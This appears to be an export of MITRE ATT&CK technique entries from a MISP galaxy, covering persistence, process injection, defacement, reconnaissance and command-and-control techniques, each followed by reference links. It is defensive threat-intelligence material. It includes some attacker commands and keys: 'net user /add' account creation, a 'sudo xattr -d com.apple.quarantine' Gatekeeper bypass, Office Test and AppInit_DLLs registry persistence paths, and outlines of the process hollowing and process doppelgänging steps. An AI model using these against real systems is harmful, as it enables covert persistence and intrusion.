Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.

The tag is: misp-galaxy:mitre-attack-pattern="Link Target - T1608.005"

Table 3721. Table References
Links
https://attack.mitre.org/techniques/T1608/005
https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

Standard Encoding - T1132.001

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001"

Table 3722. Table References
Links
https://attack.mitre.org/techniques/T1132/001
https://en.wikipedia.org/wiki/Binary-to-text_encoding
https://en.wikipedia.org/wiki/Character_encoding
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Local Account - T1136.001

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001"

Table 3723. Table References
Links
https://attack.mitre.org/techniques/T1136/001
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Internal Defacement - T1491.001

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary’s presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001"

Table 3724. Table References
Links
https://attack.mitre.org/techniques/T1491/001
https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

Control Panel - T1218.002

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)

Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.(Citation: ESET InvisiMole June 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002"

Table 3725. Table References
Links
https://attack.mitre.org/techniques/T1218/002
https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/
https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/
https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Code Repositories - T1213.003

Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software’s source code. Having access to software’s source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)

The tag is: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003"

Table 3726. Table References
Links
https://attack.mitre.org/techniques/T1213/003
https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/
https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/

Domain Account - T1136.002

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002"

Table 3727. Table References
Links
https://attack.mitre.org/techniques/T1136/002
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Office Test - T1137.002

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)

There exist user and global Registry keys for the Office Test feature:

<code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

The tag is: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002"

Table 3728. Table References
Links
https://attack.mitre.org/techniques/T1137/002
http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/
https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

System Firmware - T1542.001

Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001"

Table 3729. Table References
Links
https://attack.mitre.org/techniques/T1542/001
https://capec.mitre.org/data/definitions/532.html
https://en.wikipedia.org/wiki/BIOS
https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface
http://www.uefi.org/about
http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research
http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about
https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
https://github.com/chipsec/chipsec
http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

External Defacement - T1491.002

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)

The tag is: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002"

Table 3730. Table References
Links
https://attack.mitre.org/techniques/T1491/002
https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf
https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf
https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/
https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf

Process Hollowing - T1055.012

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)

This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012"

Table 3731. Table References
Links
https://attack.mitre.org/techniques/T1055/012
http://www.autosectools.com/process-hollowing.pdf
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Downgrade Attack - T1562.010

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)

Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade Attack - T1562.010"

Table 3732. Table References
Links
https://attack.mitre.org/techniques/T1562/010
https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/
https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique
https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

Business Relationships - T1591.002

Adversaries may gather information about the victim’s business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Business Relationships - T1591.002"

Table 3733. Table References
Links
https://attack.mitre.org/techniques/T1591/002
https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Cloud Account - T1136.003

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003"

Table 3734. Table References
Links
https://attack.mitre.org/techniques/T1136/003
https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide
https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html
https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory

Outlook Forms - T1137.003

Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)

Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003"

Table 3735. Table References
Links
https://attack.mitre.org/techniques/T1137/003
https://sensepost.com/blog/2017/outlook-forms-and-shells/
https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
https://github.com/sensepost/notruler

Launch Agent - T1543.001

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent’s name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.

Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.

Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X)

The tag is: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"

Table 3736. Table References
Links
https://attack.mitre.org/techniques/T1543/001
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

Gatekeeper Bypass - T1553.001

Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called <code>com.apple.quarantine</code> can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple’s Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application’s usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the <code>dlopen</code> function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple’s servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)

The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the <code>com.apple.quarantine</code> quarantine flag can be checked with the xattr command <code>xattr -l /path/to/examplefile</code>. Similarly, this attribute can be recursively removed from all files in a folder using xattr, <code>sudo xattr -d com.apple.quarantine /path/to/folder</code>.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)

Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the <code>curl</code> command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)

The tag is: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001"

Table 3737. Table References
Links
https://attack.mitre.org/techniques/T1553/001
https://eclecticlight.co/2020/08/28/how-notarization-works/
https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/
https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/
https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/
https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

Process Doppelgänging - T1055.013

Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
Load – Create a shared section of memory and load the malicious executable.
Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
Animate – Create a process from the tainted section of memory and initiate execution.

This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013"

Table 3738. Table References
Links
https://attack.mitre.org/techniques/T1055/013
https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx
https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx
https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx
https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/
https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

SSH Hijacking - T1563.001

Adversaries may hijack a legitimate user’s SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)

[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001"

Table 3739. Table References
Links
https://attack.mitre.org/techniques/T1563/001
https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219
https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf
https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking
https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

Symmetric Cryptography - T1573.001

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

The tag is: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001"

Table 3740. Table References
Links
https://attack.mitre.org/techniques/T1573/001
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Outlook Rules - T1137.005

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005"

Table 3741. Table References
Links
https://attack.mitre.org/techniques/T1137/005
https://silentbreaksecurity.com/malicious-outlook-rules/
https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
https://github.com/sensepost/notruler

Social Media - T1593.001

Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.

Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media - T1593.001"

Table 3742. Table References
Links
https://attack.mitre.org/techniques/T1593/001
https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e

VDSO Hijacking - T1055.014

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.

VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="VDSO Hijacking - T1055.014"

Table 3743. Table References
Links
https://attack.mitre.org/techniques/T1055/014
https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
https://lwn.net/Articles/604515/
https://www.gnu.org/software/acct/
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

AppInit DLLs - T1546.010

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)

The tag is: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010"

Table 3744. Table References
Links
https://attack.mitre.org/techniques/T1546/010
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://support.microsoft.com/en-us/kb/197571
https://msdn.microsoft.com/en-us/library/dn280412
https://technet.microsoft.com/en-us/sysinternals/bb963902

Port Monitors - T1547.010

